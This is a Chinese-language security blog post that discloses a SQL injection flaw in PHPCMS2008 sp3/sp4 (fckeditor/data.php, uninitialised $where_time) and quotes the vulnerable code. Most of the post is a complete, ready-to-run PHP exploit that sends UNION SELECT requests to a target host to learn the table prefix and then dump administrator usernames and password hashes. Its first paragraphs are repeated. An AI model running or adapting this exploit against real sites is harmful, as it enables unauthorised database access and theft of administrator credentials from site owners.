PHPCMS2008 sp3、sp4 SQL注入漏洞 & exp
很简单的小漏洞,很早就发现了,5月初丢t00ls核心了,又两个多月过去了,咋就没人公布呢。。。算了,最近没啥文章,把这个发上来凑凑数。
看代码的时候是sp3、sp4都存在问题,不过刚刚下了一份最新的sp4版本,已经修复此问题了!
又是未初始化,又是全局...国内的程序很多就是模拟全局,于是带来问题...想当初那个dz不也是么...还有很多php程序这样...对于程序员来说也许方便,但安全...漏洞文件是:fckeditor/data.php ,由于$where_time没初始化,所以可以直接union select 读想要读取的数据~先看看问题代码:很简单很清晰,很明朗的注入漏洞,一目了然,很多人知道了,就是不发。。。无语。给个exp吧:最近漏洞很多,涉及各款CMS、BBS、SHOP...请大家及时关注!
看代码的时候是sp3、sp4都存在问题,不过刚刚下了一份最新的sp4版本,已经修复此问题了!
又是未初始化,又是全局...国内的程序很多就是模拟全局,于是带来问题...想当初那个dz不也是么...还有很多php程序这样...对于程序员来说也许方便,但安全...漏洞文件是:fckeditor/data.php ,由于$where_time没初始化,所以可以直接union select 读想要读取的数据~先看看问题代码:
...
switch($action)
{
case '':
if($data == '') exit;
if(CHARSET != 'utf-8') $data = iconv('utf-8', CHARSET, $data);
$db->query("INSERT INTO ".DB_PRE."editor_data SET userid='$_userid', editorid='$editorid', ip='".IP."', created_time='".TIME."', data='$data'");
echo 'ok';
break;
case 'get':
$hour = intval($hour);
if($hour>1)
{
$hour_start = TIME - $hour*3600;
$hour_end = TIME - ($hour-1)*3600;
$where_time = " created_time>=$hour_start AND created_time<=$hour_end";
}
elseif($hour==1)
{
$hour_end = TIME - 3600;
$where_time = "created_time>=$hour_end";
}
$data = array();
$result = $db->query("SELECT `created_time`,`id` FROM ".DB_PRE."editor_data WHERE userid=$_userid AND editorid='$editorid' AND $where_time ORDER BY id DESC");//正常情况下$where_time未初始化,可以通过全局用get赋值
while($r = $db->fetch_array($result))
{
$r['created_time'] = date('Y-m-d H:i:s', $r['created_time']);
$data[] = $r;
}
$db->free_result($result);
echo json_encode($data);
break;
...
<?php
print_r('
--------------------------------------------------------------------------------
PhpCms2008 sp3 "fckeditor/data.php" SQL injection
Admin credentials disclosure exploit
BY oldjun([url]www.oldjun.com[/url]) from ([url]www.t00ls.net[/url])
--------------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}
function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
//Need to modify!!!
$cookie="GkvhDogqvGusername=oldjun; GkvhDogqvGauth=UzEPAQ5XAFFTAlBQVlxTBVEEDlVUUAANUQQGDwZaXFRRWw%3D%3D; GkvhDogqvGcookietime=0";
$agent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)";
//Remember to modify!!!
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}
/*get $prefix*/
$packet ="GET ".$path."fckeditor/data.php?action=get&where_time=/**/union/**/select HTTP/1.1\r\n";
$packet.="User-Agent: ".$agent."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("in your SQL syntax",$html))
{
$temp=explode("From ",$html);
if(isset($temp[1])){$temp2=explode("product",$temp[1]);}
if($temp2[0])
$prefix=$temp2[0];
echo "[+]prefix -> ".$prefix."\r\n\r\n";
}else{
echo "Login first!Pls modify cookie and agent!";
die();
}
echo "[~]exploting now,plz waiting\r\n\r\n";
$packet ="GET ".$path."fckeditor/data.php?action=get&where_time=1=2%20union%20all%20select%201,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20groupid=1%23 HTTP/1.1\r\n";
$packet.="User-Agent: ".$agent."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi("created_time",$html)){
echo $packet."\r\n";
echo $html."\r\n";
die("Exploit failed...");
}else{
$pattern="/(\[.*?\])/si";
preg_match($pattern,$html,$pg);
$html=str_replace("\\r\\n","",$pg[1]);
//echo $html;
$result=json_decode($html);
$num=count($result);
echo "[+]Admin number -> ".$num."\r\n";
for($i=0;$i<$num;$i++){
echo "[+]No.".$i."(username|password) -> ".$result[$i]->{"id"}."\r\n";
}
echo "\r\nExploit succeeded...\r\n";
}
?>
评论0次